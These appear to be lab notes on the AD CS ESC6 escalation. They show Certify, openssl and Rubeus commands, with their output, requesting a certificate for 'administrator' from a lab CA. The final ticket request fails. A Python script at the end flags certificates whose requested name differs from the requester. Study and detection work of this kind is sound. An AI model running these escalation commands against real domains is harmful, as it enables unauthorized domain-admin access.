
AD CS - ESC6

Escalation to Domain Admin

The "CA-Integration" template allows enrollment by the RDPUsers group. As student723, we request a certificate for DA (or EA).

PS C:\ad\tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"CA-Integration" /altname:administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student723
[*] No subject name specified, using current context as subject.

[*] Template                : CA-Integration
[*] Subject                 : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName                 : administrator

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 35

[*] cert.pem         :



[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:10.4666049

PS C:\ad\tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc6.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

PS C:\ad\tools\openssl> ..\Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:SecretPass@123 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88

[X] KRB-ERROR (66) : KDC_ERR_CERTIFICATE_MISMATCH

PS C:\ad\tools\openssl>
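
From the defender's side, the request above stands out because the requester (dcorp\student723) and the alternate name it supplied (administrator) are different principals. The following detection sketch is an added example, not part of the original notes or of any tool shown here. The record layout is constructed, and it assumes the CA's issuance audit data exposes the requester and the request attributes with the SAN in certreq's `SAN:upn=...` form; only request 35 reuses values from the transcript.

```python
import re

# Constructed sample records (assumed layout): one dict per issued request,
# carrying the request ID, the requester and the raw request attributes.
# Request 35 reuses the requester and alternate name from the transcript above.
SAMPLE_RECORDS = [
    {"request_id": 34, "requester": r"dcorp\student723",
     "attributes": "CertificateTemplate:User"},
    {"request_id": 35, "requester": r"dcorp\student723",
     "attributes": "CertificateTemplate:CA-Integration\nSAN:upn=administrator"},
    {"request_id": 36, "requester": r"dcorp\student723",
     "attributes": "CertificateTemplate:CA-Integration\n"
                   "SAN:upn=student723@dollarcorp.moneycorp.local"},
]

# Only UPN entries are compared; other SAN types (dns, email) are ignored here.
UPN_ENTRY = re.compile(r"upn=([^&\s]+)", re.IGNORECASE)


def account_name(identity):
    """Reduce DOMAIN\\user, user@realm or plain user to a lowercase account name."""
    name = identity.rsplit("\\", 1)[-1]
    return name.split("@", 1)[0].lower()


def requested_upns(attributes):
    """Return every UPN supplied through a 'SAN:' request attribute."""
    upns = []
    for line in attributes.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "san":
            upns.extend(UPN_ENTRY.findall(value))
    return upns


def find_san_mismatches(records):
    """Flag issued requests whose requester-supplied UPN names another principal."""
    alerts = []
    for rec in records:
        requester = account_name(rec["requester"])
        for upn in requested_upns(rec["attributes"]):
            if account_name(upn) != requester:
                alerts.append({"request_id": rec["request_id"],
                               "requester": rec["requester"], "san_upn": upn})
    return alerts


if __name__ == "__main__":
    for alert in find_san_mismatches(SAMPLE_RECORDS):
        print("ALERT", alert)
```
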
